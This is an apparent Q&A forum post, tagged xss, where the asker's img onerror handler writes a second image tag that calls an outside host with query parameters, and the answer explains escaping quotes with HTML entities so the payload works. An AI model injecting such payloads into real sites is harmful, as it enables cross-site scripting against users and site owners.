# How to send http request on img tag's onerror attribute?

Tags: javascript, xss

I've tried as follows, but it doesn't work

```
  <body>
     <img src=a onerror="document.write('<img src=\"http://www.somdomain.com:8088/alert?type=teSt&msg=www\">')">
  </body>
```

Answer (score 2, accepted):

`\` is not an escape character in HTML.

To put a `"` character inside an attribute value delimited with `"` characters, you must represent it as an entity. e.g. `&quot;`.

---

Keep in mind that cross-origin restrictions prevent load and error events firing on images srced from a different origin.